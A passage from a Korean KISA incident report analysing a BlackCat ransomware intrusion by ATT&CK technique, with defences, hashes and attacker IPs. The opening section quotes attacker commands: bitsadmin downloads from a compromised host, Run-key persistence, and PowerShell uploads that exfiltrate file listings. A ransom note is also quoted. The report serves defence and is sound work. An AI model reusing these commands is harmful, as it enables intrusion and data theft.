mfc42u-evc-win10.dll c:\users\public\mfc42u.dll
mfc42u-vnc-win10.dll c:\users\public\vnc\mfc42u.dll
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/neat.
dll c:\programdata\neat.dll
bitsadmin /transfer mmm http://[compromised host]/xe/files/attach/images/555/vnc.
dll c:\users\public\vnc\evc.dll
79
기술 보고서
근거 2 reg add vs reg delete, reg query

공격자가 레지스트리를 조작(추가, 삭제, 질의)할 때, 아래와 같이 명령어를 사용합니다. 이 때 레지스트리 값으로
msinfo, msinfo64, msinfos을 사용합니다. 또한, reg add에서는 단어 전체 혹은 첫글자를 대문자로 사용하며,
reg delete와 reg query에서는 소문자로 사용하고 있습니다. reg add와 reg delete가 혼용되어 같은 시간대에
사용되기 때문에, 매뉴얼이 존재하고 값을 수정하는 것으로 추정할 수 있습니다.

reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v msinfos /d “C:\
reg delete hkcu\software\microsoft\windows\currentversion\run /v RLWa /f
reg delete hkcu\software\microsoft\windows\currentversion\run /v RNta /f
근거 3 공격자의 실수
•MyVNC 악성코드 실행
MyVNC 악성코드를 실행시키는 과정에서 공격자는 명령제어가 정상적으로 연결되지 않은 문제점을 인지하게
되었습니다. 그 원인은 공격자가 새로운 경로(c:\users\public\myvnc\)로 msinfo32를 복사하지 않았기
때문입니다. 이에 대하여 forfiles 명령어를 통해 확인한 공격자는 장애 원인을 제거하고 MyVNC 악성코드를
실행할 수 있었습니다.
# 4.2. Monitoring 예제 중 발췌
mkdir c:\users\public\myvnc
whoami
forfiles /p c:\users\public\myvnc
copy c:\windows\syswow64\msinfo32.exe c:\users\public\myvnc\msinfo32.exe
80
기술 보고서
•드라이브(C, D) 정보 유출
공격자는 디렉터리(하위 포함) 내 파일정보를 저장할 때 각 드라이브의 이름을 이용하여 파일명을 작성합니다.
다만, C 드라이브 정보를 dirs-d.ini에 저장했기 때문에 불필요하게 명령을 다시 수행할 수밖에 없었습니다.
그 외에도 파워셸 스크립트를 이용해 명령제어지로 해당 파일을 업로드하게 되는데, 공격자는 dir-c.ini와 dir-
d.ini를 업로드 하도록 명령했기 때문에, 정보유출은 실패했을 것입니다.(올바른 파일명은 dirs-c.ini, dirs-
d.ini입니다)
dir /s d: > c:\users\public\dirs-d.ini

dir /s c:\users\[users] > c:\users\public\dirs-d.ini
dir /s c:\users\[users] > c:\users\public\dirs-c.ini
dir /s d: > c:\users\public\dirs-d.ini
powershell (New-Object System.Net.WebClient).UploadFile(‘http://[compromised
host]/xe/files/attach/images/555/uploadfile.php’, ‘c:\users\public\dir-c.ini’)
powershell (New-Object System.Net.WebClient).UploadFile(‘http://[compromised
host]/xe/files/attach/images/555/uploadfile.php’, ‘c:\users\public\dir-d.ini’)
References
1. TTPs #9 개인의 일상을 감시하는 공격전략 분석
2. Ably
81
기술 보고서
Part. 3
KISA 침해사고분석단 사고분석팀

신우성 선임
블랙캣 랜섬웨어 플레인비트

이예나 선임, 이상아 연구원
3-2 침해사고 기술보고서 한택승 연구원
1. Introduction
랜섬웨어(Ransomware)란 몸값을 뜻하는 랜섬(ransom)과 악성코드(malware)의 합성어로 사용자의 컴퓨터가

랜섬웨어에 감염될 경우 중요 데이터가 암호화되며, 암호화된 데이터를 복구하기 위한 대가로 금전을 요구하는
악성코드를 말한다.
이번 기술 보고서 주제인 블랙캣(BlackCat 또는 ALPHV) 랜섬웨어는 `21년 11월 전 세계 처음으로 발견됐으며,

RUST 프로그래밍 언어를 기반으로 한 최초의 랜섬웨어로 백신 탐지 확률이 낮으며 빠르게 암호화가 가능하고
다양한 운영체제 플랫폼에서 사용할 수 있는 특징이 있다.
특히, ‘22년 4월 美 FBI는 해당 랜섬웨어에 의한 피해 확산을 예방하기 위해 공격 IoC(Indicators of Compromise)를

공개했으며, 국내에서도 `22년 7월 이후, 현재까지 제조업체를 대상으로 총 5건의 피해가 확인됐다. 이에
한국인터넷진흥원과 플레인비트는 신고된 피해 기업 분석을 통해 발견된 공격자들의 공격 방법과 전략에 따른
대응방안(ATT&CK 프레임워크)을 소개하여 유사 사고사례를 예방하고자 한다.
82
기술 보고서
2. Summary
블랙캣 랜섬웨어 해킹그룹의 기업 침투단계는 아래와 같다.
•(최초침투) VPN 계정 탈취 후 내부 침투
•(정보수집) 공격도구를 통해 계정 및 서버 정보 수집
•(내부이동) 수집된 계정정보 및 서버정보를 통해 내부이동
•(거점확보) AD 관리자 계정을 탈취해 공격 거점 확보 및 원격 접근 프로그램 설치
•(내부전파) 공유 폴더 및 SMB를 통해 악성코드 설치 및 스크립트 실행
•(목적달성) 거점서버를 통해 다른 서버에 랜섬웨어 실행
83
기술 보고서
3. ATT&CK Matrix
3.1 Initial Access: 최초 침투 - (개요도 ①)

공격자는 다크웹* 및 무작위 대입 공격을 통해 기업의 VPN 계정을 탈취하여 내부 시스템에 접근한다. 아래 내용은
무작위 대입 공격을 통한 VPN 계정 탈취 로그이다.
* 다크웹에 공개되어 있거나 판매되고 있는 VPN계정 구매
무작위 대입 공격을 통한 VPN 계정 탈취 로그(VPN로그)
date=2023-03-13 time=15:52:26 logid=”0101039949” type=”event” subtype=”vpn”

level=”information” vd=”root” eventtime=1678690346495768584 tz=”+0900”
logdesc=”SSL VPN statistics” action=”tunnel-stats” tunneltype=”ssl-tunnel”
tunnelid=860146678 remip=42.116.XX.XX tunnelip=20.20.20.3 user=”son”
group=”SSLVPN” dst_host=”N/A” nextstat=600 duration=17443 sentbyte=180445045
rcvdbyte=22665554 msg=”SSL tunnel statistics”
(중간생략)
date=2023-03-13 time=15:44:30 logid=”0101039949” type=”event” subtype=”vpn”

level=”information” vd=”root” eventtime=1678689871043048253 tz=”+0900”
logdesc=”SSL VPN statistics” action=”tunnel-stats” tunneltype=”ssl-tunnel”
tunnelid=860146687 remip=42.116.XX.XX tunnelip=20.20.20.1 user=”long”
group=”SSLVPN” dst_host=”N/A” nextstat=600 duration=1203 sentbyte=16083894
rcvdbyte=2583989 msg=”SSL tunnel statistics”
84
기술 보고서
3.2 Execution: 실행 - (개요도 ② ③)
가. Command and Scripting Interpreter: PowerShell

파워셸을 이용하여 Coblat Strike 스크립트 다운로드 및 실행
파워셸을 통해 Cobalt Strike 실행 이력(이벤트로그)
85
기술 보고서
파워셸을 통해 추가 파일 다운로드(이벤트로그)
Type : Information
Date :
Time :
Event : 600
Source : PowerShell
Category : 공급자 수명 주기
User : N/A
Computer : [)
Description:
“Alias” 공급자가 Started입니다.
세부 정보:
ProviderName=Alias
NewProviderState=Started
SequenceNumber=1
HostName=ConsoleHost
HostVersion=4.0
HostId=f97081ad-4cf3-4a8d-82c9-f2154a9975e1
HostApplication=powershell.exe -executionpolicy remotesigned -File .\\Get-
DataInfo.ps1 method
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
86
기술 보고서
3.3 Persistence: 지속 - (개요도 ② ③)

원격 접근 프로그램을 설치하여 VPN 통한 접근 외 외부에서 접근할 수 있는 추가적인 방법을 구성한다.
공격자가 사용하는 원격 액세스 공격 도구
도구명 도구 설명
ScreenConnect.exe 원격 접근 프로그램
Socks.exe / Socks2.exe 원격 접속 악성코드
winscp.exe 원격 접속 악성코드
나. Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder

공격자는 세션 정보 및 SSH HOST KEY 등 접속과 관련된 레지스트리를 변경하는 파일을 생성한다.
공격자가 사용하는 세션 정보 도구
putty.reg 접속 관련 registry 변경 파일
WinSCP.ini ssh host key 및 세션 정보 존재
다. Scheduled Task/Job:Scheduled Task

공격자는 원격에서 접근하기 위해 악성 프로그램(원격제어 악성코드 등) 작업스케줄러에 등록한다.
작업스케줄러에 악성코드 등록(이벤트로그)
Type : Information
Date :
Time :
Event : 106
Source : Microsoft-Windows-TaskScheduler
Category : 등록된 작업
User : \SYSTEM
Computer :
Description:
“NT AUTHORITY\System” 사용자가 작업 스케줄러 작업 “\wow64”을(를) 등록했습니다.
87
기술 보고서
작업 스케줄러 설정파일(wow64)
작업 스케줄러 설정파일(wow64)
<?xml version=”1.0” encoding=”UTF-16”?>

<Task version=”1.1” xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/
task”>
<RegistrationInfo>
<Author>GOOD\administrator</Author>
</RegistrationInfo>
<Triggers>
<TimeTrigger>
<Enabled>true</Enabled>
<Repetition>
<Interval>PT2M</Interval>
<Duration>P365D</Duration>
<StopAtDurationEnd>false</StopAtDurationEnd>
</Repetition>
<StartBoundary> </StartBoundary>
</TimeTrigger>
</Triggers>
(중간 생략)
<Actions Context=”Author”>
<Exec>
<Command>C:\Program Files\socks.exe</Command>
<Arguments>start</Arguments>
</Exec>
</Actions>
</Task>
88
기술 보고서
3.4 Privilege Escalation: 권한 상승 - (개요도 ②)
가. Valid Accounts: Domain Accounts

공격자는 지속성, 권한 상승, 방어 회피를 얻기 위한 수단으로 도메인 계정의 자격 증명을 획득한다. 도메인
계정 자격 증명을 얻기 위해 Credential Dump를 하거나 도메인 컨트롤러를 손상시키기도 한다.
3.5 Defense Evasion: 방어 회피 - (개요도 ③)
가. Impair Defenses : Disable or Modify Tools

공격자는 랜섬웨어 등 악성코드 탐지를 막기 위해 윈도우 디펜더 등 백신을 강제 종료한다.
공격자가 사용하는 백신 제거 및 종료 도구
del.bat 백신 셧다운 스크립트
ProcessHacker.exe 시스템 프로세스를 관리하기 위한 유틸리티 도구
psexec64.exe 시스템 프로세스를 관리하기 위한 유틸리티 도구
file64.exe 특정 프로세스(백신 포함) 강제 종료
ComKJ.sys 특정 프로세스(백신 포함) 강제 종료
Backstab.exe 백신 강제 종료 도구
3.6 Credential Access: 자격 증명 - (개요도 ②)
가. OS Credential Dumping : Security Account Manager

공격자는 계정정보를 획득하기 위해 계정탈취 도구(mimikatz)를 사용하여 계정정보를 수집한다.
공격자가 사용하는 계정탈취 도구
mimikatz.exe 계정 정보 수집 도구
89
기술 보고서
계정 정보 수집 도구(mimikatz.exe) 실행 이력 (UserAssist)
3.7 Discovery: 탐색 - (개요도 ②)
가. Network Service Discovery

공격자는 내부 이동을 위해 네트워크 스캔 도구를 사용하여 피해 시스템 네트워크 정보를 수집한다.
공격자가 사용하는 네트워크 스캔 도구
net64.exe 네트워크 주소, 숨겨진 공유폴더 확인, 원격 접근 기능 제공
ADfind.exe AD 정보 수집(도메인 계정, 권한 그룹, 네트워크 구성)
netscan.exe 네트워크 스캔 도구
netscan.exe 네트워크 스캔 도구
•net64.exe
90
기술 보고서
3.8 Lateral Movement: 내부 이동 - (개요도 ②)
가. Remote Services Remote Desktop Protocol

공격자는 수집한 정보를 이용해 Active Directory 내 다른 서버로 원격 접속해 내부 이동한다. 내부이동 시
위에서 사용한 RDP 정보 수집 도구 및 네트워크 스캔 도구를 통해 추가 서버를 찾으며, 가장 많은 정보를
가지고 있는 서버를 거점으로 삼아 랜섬웨어 공격 준비를 한다.
나. Remote Services VNC

공격자는 원격 접근 프로그램(ScreenConnect.exe)을 설치해 VPN을 통한 접근 외 외부에서 접근할 수
있는 방법을 추가한다.
원격 접근 프로그램(ScreenConnect.exe) 설치 이벤트로그 (System.evtx)
시스템에 서비스가 설치되었습니다.
서비스 이름: ScreenConnect Client (64b809f03e7ee623)

서비스 파일 이름: “C:\Program Files (x86)\ScreenConnect Client (64b809f03e7ee
623)\ScreenConnect.ClientService.exe” “?e=Access&y=Guest&h=instance-cirigy-
relay.screenconnect.com&p=443&s=520d306d-0107-4f9c-ade2-ebd80d745274&k=BgIAA
ACkAABSU0ExAAgAAAEAAQCpUxcBgpXCfG142Ltj1%2fyzENtvFB2woXWjZHqVXgzEqk7K6o2xRVa
XgBJzHb5RtysbBX%2bfwkhzQtkXocIhT1HbpuMM5aHhb45kZUhsmT9vey1WsXnbnn%2fs47VdQ2D
JlzQZnr81AtZbToB%2b2%2bsw85xGWQp0%2bJYHHcjZCFE4QhR2GPyDL%2fuwHtIFVlszTdTsEF1
RlAyy5dJpi%2f2R0sj5xNX3x4%2bTx%2fCYmq0PqSrOWdSjr4moyvgm64%2fNJrfd49%2f5vTlGy
3jEUisf%2f%2b66QuCzR8Hfk9o0Z5ov1ScKQIxmWFVSJZxi%2ft2P%2bZ2UQxo6cD9yjZWmXh9Vh
voD%2bX1zZ9n4gLjT&t=&c=&c=&c=&c=&c=&c=&c=&c=”
서비스 유형: user mode service
서비스 시작 유형: auto start
서비스 계정: LocalSystem
91
기술 보고서
원격 접근 프로그램(ScreenConnect.exe) 실행 이벤트로그 (System.evtx)
ScreenConnect Client (3eaca1af958d8405) 서비스가 running 상태로 들어갔습니다.
네트워크 스캔 도구(AdFind.exe) 사용하여 원격 접근 시도 이벤트로그 (Security.evtx)
명시적 자격 증명을 사용하여 로그온을 시도했습니다.

주체:
보안 ID: S-1-5-21-2805692261-3615434627-2978759279-500
계정 이름: Administrator
계정 도메인: [계정 도메인]
로그온 ID: 0x9EF76EAD9
로그온 GUID: {00000000-0000-0000-0000-000000000000}
자격 증명이 사용된 계정:
계정 이름: administrator
계정 도메인: [계정 도메인]
로그온 GUID: {76b3720e-8929-970e-a97f-8b308a137cba}
대상 서버:
대상 서버 이름: [대상 서버 이름]
추가 정보: ldap/[sever name]/[domain]
프로세스 정보:
프로세스 ID: 0x103c
프로세스 이름: C:\Users\Administrator\Downloads\1\AdFind.exe
네트워크 정보:
네트워크 주소: -
포트: -
92
기술 보고서
다. Lateral Tool Transfer

악성 파일을 사용하여 공유 폴더를 통해 다른 서버에 존재하는 파일을 실행한다.
공격자가 사용하는 악성 도구
ProcessHacker.exe 시스템 프로세스를 관리하기 위한 유틸리티 도구
del.bat 보안 소프트웨어를 무력화시키기 위한 배치 파일
•ProcessHacker.exe
93
기술 보고서
3.9 Command and Control: 명령 및 제어 - (개요도 ② ③)
가. Remote Access Software

공격자는 다른 시스템에 대한 원격 액세스를 활용하기 위해 공격 도구를 사용한다.
공격자가 사용하는 원격 액세스 공격 도구
psexec.exe 공유 폴더와 SMB를 사용하여 원격 접근, 명령어/파일 실행 등 기능 제공
PsExec64.exe psexec.exe 64bit
zagent.exe 원격 프로세스 조작, 파일 실행 기능 제공
•PsExec.exe
94
기술 보고서
•zagent.exe
3.10 Impact: 영향 - (개요도 ④)
가. Data Encrypted for Impact

공격자는 거점서버를 통해 다른 서버에 접속하여 랜섬웨어를 실행한다. 랜섬웨어명의 경우 회사명 혹은
무작위 값으로 되어 있고 해당 랜섬웨어를 실행시켜 파일을 암호화시킨다.
랜섬웨어
[회사명].exe windows 환경에서의 실행파일
[회사명].elf windows 환경에서의 실행파일
95
기술 보고서
랜섬웨어 실행 흔적 (Appcompatcache)
랜섬웨어에 감염된 후, 각 폴더에는 아래와 같은 랜섬노트(RECOVER-v*****n-FILES.txt)가 생성된다.

RansomNote
ㅣ What happened?
Important files on your network was ENCRYPTED and now they have “v*****n”
extension. In order to recover your files you need to follow instructions
below.
ㅣ Sensitive Data
Sensitive data on your network was DOWNLOADED.
If you DON’T WANT your sensitive data to be PUBLISHED you have to act
quickly.
Data includes:
- Employees personal data, CVs, DL, SSN.
- Complete network map including credentials for local and remote services.
- Private financial information including: clients data, bills, budgets,
annual reports, bank statements.
- Manufacturing documents including: datagrams, schemas, drawings in
solidworks format
- And more...
Samples are available on your personal web page linked below.

ㅣ CAUTION
DO NOT MODIFY ENCRYPTED FILES YOURSELF.
DO NOT USE THIRD PARTY SOFTWARE TO RESTORE YOUR DATA.
YOU MAY DAMAGE YOUR FILES, IT WILL RESULT IN PERMANENT DATA LOSS.
ㅣ What should I do next?
1. Download and install Tor Browser from: https://torproject.org/
2. Navigate to:
http://cfyk7s43hnxheiyyd4affb46mjcilyf5mzycjcoeotydqbgr2jcluwyd.
onion/?access-key=r6R7nUjb6uCBC…(중간생략)…i6Zv%2BCzf9Zmjbf4HtDKPonZ1Q4vwR2Q%
3D%3D
96
기술 보고서
나. Shutdown / Reboot
랜섬웨어 감염을 위해 가상서버 일괄 종료한다. 추가적으로 랜섬웨어 감염 시키고 서버를 재부팅한다.
ATT&CK Matrix
Tatic ID Sub-techniques Description
Initial Access T1133 External Remote Services 외부 장비(VPN)를 통한 접근
Command and Scripting Interpreter: 파워셸을 이용한 Cobalt Strike

Execution T1059.001
PowerShell 스크립트 다운로드 및 실행
Persistence T1133 External Remote Services 외부 장비 외 추가 접근 환경 구성
Boot or Logon Autostart Execution :

Persistence T1547.001 접속 관련 레지스트리 변경
Registry Run Keys / Startup Folder
Persistence T1053.005 Scheduled Task/Job:Scheduled Task 작업스케줄러에 악성코드 등록
Privilege Escalation T1078.002 Valid Accounts: Domain Account 도메인 계정 사용
Defense Evasion T1562.001 Impair Defenses : Disable or Modify Tools 백신 강제 종료
OS Credential Dumping : OS Credential Dumping :

Credential Access T1003.002
Security Account Manager Security Account Manager
Discovery T1046 Network Service Discovery 네트워크 스캔 도구 사용
Remote Services :
Lateral Movement T1021.001 원격 데스크톱(RDP)을 통해 원격 접속
Remote Desktop Protocol
Lateral Movement T1021.005 Remote Services : VNC 원격 접근 프로그램 사용
악성 파일 사용하여 공유 폴더통한
Lateral Movement T1570 Lateral Tool Transfer
원격 접근
Command and 원격 액세스 활용하기 위한 공격

T1219 Remote Access Software
Control 도구 사용
Impact T1486 Data Encrypted for Impact 랜섬웨어 감염
Impact T1529 System Shutdown / Reboot System Shutdown / Reboot
97
기술 보고서
4. Defense
4.1 VPN 보안강화
VPN 계정 보안
VPN 계정의 패스워드는 주기적 변경과 복잡성(영/대소문자, 숫자, 특수문자 혼합 10자리 이상 권장)을 만족하도록
정책적 설정이 필요하다. 또한 VPN 접속시, 소유(또는 생체 기반 2차 인증(문자메시지, 모바일 앱 등)을 적용하는
것을 권장한다. 추가적으로 퇴사자 및 미사용 계정은 바로 삭제하여 관리해야한다.
VPN 접근제어 강화
비허가된 외부 접근 차단을 위해 VPN 접속 허용 IP를 화이트리스트 방식으로 접근 제어 설정하고 해외 접속이
필요한 계정 외의 계정에서 VPN 사용이 불가하도록 설정하는 것을 권장한다.
4.2 랜섬웨어 대응
랜섬웨어 차단 기능 활성화
각종 백신 프로그램은 랜섬웨어 방지 기능을 제공한다. ‘제어된 폴더 액세스’, ‘파일 위변조 탐지’, ‘랜섬웨어 데이터
복구’ 등 일부 유/무료 서비스들을 활성화하여 랜섬웨어로부터 보호할 수 있다.
랜섬웨어 대응 가이드 라인 확인
한국인터넷진흥원은 랜섬웨어 감염 시 이에 대응하기 위한 목적으로 랜섬웨어 대응 가이드라인을 제공하고 있다.
가이드라인에서는 랜섬웨어 예방을 위한 보안 수칙이나 랜섬웨어 대응과 관련된 요청 등의 내용이 포함되어있다.
다운로드 방법
www.boho.or.kr → 자료실 → 가이드 및 매뉴얼 ’랜섬웨어 대응 가이드’, ‘안전한 정보시스템 백업 가이드’
98
기술 보고서
중요 자료 정기 백업
시스템 내 중요 파일이 백업되어 있지 않을 경우 피해 규모가 커질 수 있다. 중요 파일을 네트워크로 연결된 다른
서버로 백업할 경우 랜섬웨어 감염 시 백업 서버 또한 감염될 수 있다.
때문에, 중요 파일은 주기적으로 외부 저장장치나 인터넷이 연결되어 있지 않은 오프라인 환경의 PC 또는 서버 등에

백업을 수행하는 것을 권고한다. 또한, 백업 파일이 저장되는 시스템은 2차 인증을 적용하여 인가자만 접근할 수
있도록 설정하는 것을 권고한다.
4.3 시스템 및 인프라 관리
사용하지 않는 서비스 비활성화

가장 대표적인 서비스로는 SSH, TELNET, 원격 데스크톱, VPN 등 사용하지 않는 서비스들이 외부에서 접근 가능할
경우 초기 공격 대상이 될 수 있으며, 이미 공격자가 서버에 침투하였을 경우에는 내부 확산으로 이어질 가능성이
매우 높다. 때문에, 사용하지 않는 서비스는 비활성화 및 제거하는 것을 권고한다.
Active Directory 환경 보안 정책 점검
다수의 전산 자원 관리를 위해 사용되는 AD(Active Directry)는 도메인에 가입되어 있는 단말기나 서버의 일률적
제어가 가능하기 때문에 침해사고 발생 시 피해 규모가 커질 수 있다. AD 환경에서의 기본 보안 강화는 아래와
같다.
① 불필요한 관리자 계정 비활성화

② 관리자 계정 최소한 사용
③ 그룹 정책 템플릿(GPT) 변경 사항 모니터링
④ AD 정책 배포와 관련 SMB 포트 사용 이벤트 모니터링
⑤ 서버 계정 간 적절한 액세스 제어 구현
망 분리 인프라 환경 구성 권고
공격자는 취약한 호스트 PC, 서버를 감염시키며, 감염된 호스트들은 다른 호스트 PC들을 찾아서 공격한다.
악성코드에 감염된 서버와 동일한 네트워크 대역에 속해 있는 서버는 2차 공격 및 감염에 취약할 수 있다. 때문에,
사내 시스템 업무 유형들을 파악하여 업무에 맞는 네트워크 망을 구성하여 체계적으로 관리 및 운영해야 한다.
99
기술 보고서
원격 데스크톱 접근 보안 강화
공격자는 원격 데스크톱 프로토콜을 이용하여 피해 시스템에 접근할 수 있다. 공격자가 원격으로 서버에 접근할
경우 일반 사용자처럼 작업을 수행할 수 있다. 따라서 인가된 사용자만 접근이 가능하도록 화이트리스트 정책을
권고한다. 또한, 원격 데스크톱 접근 시 OTP와 같은 다중 인증 방식(MFA, Multi-Factor Authentication)을 통해
서버에 접속할 수 있도록 제한하는 것을 권고한다.
로컬 관리자 계정 정보 변경
피해 시스템에 지속적인 접근 유지를 위해 백도어 계정을 생성한다. 윈도우 서버의 경우 ‘Administrator’가 기본
관리자 계정으로 생성된다. 관리가 계정 이름을 변경하거나 비활성화하여 공격자로부터 관리자 계정 접근을
제한해야 한다. 또한, 비밀번호 정책은 공격자가 유추하기 어려운 특수문자, 대/소문자, 숫자 조합으로 10자리
이상을 권고한다.
4.4 잠재적 위협 요소 제거
악성 파일 삭제 또는 운영체제 재설치 후 사용
공격자가 사용한 공격 도구가 서버 내에 존재할 경우, 동일한 공격자에 의해 추가 공격이 수행될 가능성이 높다.
공격자가 추후 공격을 위해 남겨둔 파일, 프로세스, 서비스 등 위협 요소를 제거하여 공격자의 추가 공격을 차단한다.
혹은 운영체제를 재설치 하는 것도 위협을 제거하는 하나의 방법이 될 수 있으므로 최신 운영체제 설치하여
취약점에 대비하는 것을 권고한다.
4.5 한국인터넷진흥원 정보보호 서비스 활용
한국인터넷진흥원은 개인/기업 보안에 도움이 될 수 있다. 중소기업 대상으로 현재 ‘중소기업 침해사고 피해지원
서비스’를 제공 중이다. 더불어 각종 보안 보고서, 대응 가이드를 제공하고 있으며 보안 관련 중요한 이슈 발생 시
홈페이지 내 보안공지를 통해서 공유하고 있다. 자세한 내용은 아래 한국인터넷진흥원 인터넷 보호나라에서 확인할
수 있다.
한국인터넷진흥원 보안공지
•보안 관련 주요 이슈 발생 시 한국인터넷진흥원에서 관련 내용을 공지하고 있다.
[보안공지 > 알림마당 : KISA 인터넷 보호나라&KrCERT]
100
기술 보고서
한국인터넷진흥원 배포 가이드/보고서
•한국인터넷진흥원에서 발간하는 각종 보안 가이드와 공격그룹 분석 보고서를 제공하고 있다.
[보고서/가이드 > 알림마당 : KISA 인터넷 보호나라&KrCERT]
중소기업 대상 보안서비스
•중소기업을 대상으로 한국인터넷진흥원에서 제공하는 보안서비스이며, 이번 샤오치잉 공격 관련으로는 내 서버
돌보미, 중소기업 홈페이지 보안강화 보안서비스를 권장한다.
[기업 서비스 홈 > 기업 서비스 > 주요사업 소개 > 정보보호 서비스 : KISA 인터넷 보호나라&KrCERT]
중소기업 침해사고 피해지원 서비스

•중소기업에서 침해사고가 발생하는 경우 한국인터넷진흥원에서 원인분석 및 재발방지를 위한 원인제거,
예방컨설팅, 보안교육을 지원하고 있다.
[중소기업 피해지원 > 정보보호 서비스 : KISA 인터넷 보호나라&KrCERT]
사이버 위기대응 모의훈련

•중소기업에 해당되지 않더라도 중견, 대기업 등 참여대상 제한이 없는 서비스도 제공하고 있다. 사이버 공격
예방 및 피해 최소화를 위해 기업의 보안수준 강화와 임직원 인식을 제고하고자 실전형 모의훈련을 실시하고
있다.
[사이버 위기대응 모의훈련 > 기업 서비스 > 주요사업 소개 > 정보보호 서비스 : KISA 인터넷 보호나라&KrCERT]
101
기술 보고서
5. Conclusion
지금까지 블랙캣 랜섬웨어 해킹그룹의 공격 방법과 전략에 대해 살펴봤다. 지금 이 순간에도 공격자들은 기업 전산

시스템에 침투하기 위해 새로운 원데이 취약점과 전략으로 공격을 시도하고 있으며 랜섬웨어 침해사고는 그 동안
쌓은 기업의 대외 이미지와 신뢰를 한 순간에 무너질 수 있다는 사실을 잊지 말아야 한다.
이를 위해 기업 보안·전산 담당자는 주요 자산과 백업 체계를 다시 한 번 재점검하여 보안을 강화하고

한국인터넷진흥원에서 공개한 침해사고 기술보고서와 보호나라의 보안공지, 다양한 사이버 보안 매체 등에 관심을
기울여 공격자들의 전략을 예측하여 대비한다면 최소한 공격자가 목표를 달성을 하기 전 차단·예방 할 수 있을
것이다.
※ 기업 침해사고 발생 시, KISA-보호나라 홈페이지를 통해 신고

→ 랜섬웨어, 디도스, 일반 해킹사고 신고
https://www.boho.or.kr/kr/subPage.do?menuNo=205004
Appendix
악성파일(웹셸)
MD5 Hash
88A630E0633045159CE0C0ACC01BD5F4
ACE2AEF7F6F03233AC9836977A82A276
E458DB1C3C1359A12A3D4C952022CB71
67EBA714F23EE4B7C9CAF7136CB983DB
0FBD87B813516942F0391D783F4F70F2
4C3866023B50AA90A7BAA30A49A7C06C
102
기술 보고서
공격자 IP
IP 조회는 KISA WHOIS OpenAPI 활용
IP 국가코드(국가명)
8.213.132.75 SG(싱가포르)
5.28.34.201 KH(캄보디아)
36.227.231.17 TW(대만)
114.43.86.96 TW(대만)
203.69.23.25 TW(대만)
114.43.86.96 TW(대만)
142.202.49.101 US(미국)
106.55.207.123 CN(중국)
218.190.235.118 HK(홍콩)
149.154.161.220 AG(안티구아 바부다)
218.190.235.135 HK(홍콩)
149.154.161.253 AG(안티구아 바부다)
114.246.35.136 CN(중국)
111.202.167.85 CN(중국)
114.255.249.182 CN(중국)
114.247.113.166 CN(중국)
103.142.65.131 IN(인도)
103.142.65.141 IN(인도)
156.251.145.233 SC(세이셸)
163.47.15.102 KH(캄보디아)
104.28.211.105 US(미국)
114.43.88.126 TW(대만)
203.69.23.25 TW(대만)
114.25.103.20 TW(대만)
192.109.205.229 US(미국)
192.109.205.229 US(미국)
192.109.205.179 US(미국)
103
2023년 상반기
사이버
위협 동향
보고서
세종특별자치시 갈매로 477, 정부세종청사 4동 3층~6층 [나주본원] 전라남도 나주시 진흥길 9 한국인터넷진흥원
대표번호. 국번없이 (무료)1335 (정부민원 110) [서울청사] 서울시 송파구 중대로 135 (가락동) IT벤처타워
대표번호. 1433-25(수신자 요금 부담)

2023년 상반기 사이버 위협 동향 보고서

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

2023년 상반기 사이버 위협 동향 보고서

Uploaded by

Copyright:

Available Formats

2023년 상반기

전문가 2-1. 쿠팡 Blueteam 곽성현 Staff Security Engineer :

Trend┃ 2023 상반기

과학기술정보통신부(한국인터넷진흥원)은 「정보통신망 이용촉진 및 정보보호 등에 관한 법률」제48조의 3(침해사고

연도 2021년 2022년 2023년

연도 2022 2022 2023

표 1-2 유형별 침해사고 신고 현황

연도 2022 2022 2023

표 1-3 업종별 침해사고 신고 현황

2023년 1월 1일, 미상의 해커가 해킹포럼에 이동통신사의 고객정보 약 2천 만 건을 6 비트코인에 판매하겠다는

정보 유출시점으로 추정되는 `18년 당시의 시스템 및 DB 접속에 대한 로그정보가 거의 남아있지 않아 시나리오

1) 샤오치잉 : 한자로 새벽의 기병대라는 뜻

실제로 올해 초부터 크리덴셜 스터핑으로 인한 금전 피해가 지속적으로 신고 되고 있다. 이를 방지하기 위해 사용자

그림 2-1 텔레그램 피싱 공격 및 계정 탈취 흐름도

그림 2-2 텔레그램 로그인 피싱사이트

만약 사용자가 피싱사이트에 속아 전화번호를 입력하면 해커는 악성 스크립트를 실행하여 수 초 내에 새로운

텔레그램 사칭 사이트(URL) 텔레그램 로그인 피싱사이트 전화번호 입력 시

훔친 전화번호, 인증코드로 해커가 다른 기기에서 접속하여 대화목록, 채팅, 연락처 등

그림 2-3 텔레그램 피싱사이트를 이용한 단계별 공격 수법

해당 텔레그램 피싱사이트를 상세분석한 결과 인증키, 초대코드, 전화번호, 토큰 등 Telegram Web 로그인에

그림 2-4 텔레그램 피싱사이트에서 계정 정보를 유출하는 악성 스크립트

그림 2-5 텔레그램 2단계 인증 설정방법

`23년 보안취약점 신고포상제 상반기 현황 분석

Application 내 분류를 하면 ‘보안 프로그램’ 비율이 작년대비 증가(작년 45% → 올해 54%) 하고 다른 분야 대비

이에 사용자들도 보안 솔루션을 사용하면 안전하다고만 생각하기보다는 보안 업데이트를 상시하고 제조사에서도

IoT 제품의 경우 상대적으로 작년대비 감소(78건→48건)하였다. 이전 대비 보안 내재화가 됨에 따라 분석 수요가

1월 초 독일 보안전문가 블라디미르 팔란트(Wladimir Palant)는 한국 금융 프로그램이 필요이상으로 많은 것을

3월 초 북한 해킹그룹 라자루스의 해킹 할동에 악용된 것으로 추정되는 취약점이 확인되었다. I社 등 보안

또한 6월, CISA(Cybersecurity and Infrastructure Security Agency)에서는 클롭(Cl0p) 랜섬웨어 해킹그룹이

해킹 사고가 지속 발생함에 따라 보안 요구 사항은 점점 더 까다로워지고 있으며 방어 시스템의 기능은 매우 높은

Active Directory 환경을 악용한 악성코드 내부 전파 기법 왕성

Newly Tracked Malware Families by Category, 2022

그림 4-1 ‘22년 유형별 신종 악성코드 발견 통계 (Mandiant, M-Trend 2023)

맨디언트 보고서에 따르면, 2022년 신종 악성코드 계열 588개를 추적한 결과 백도어(34%), 다운로더(14%),

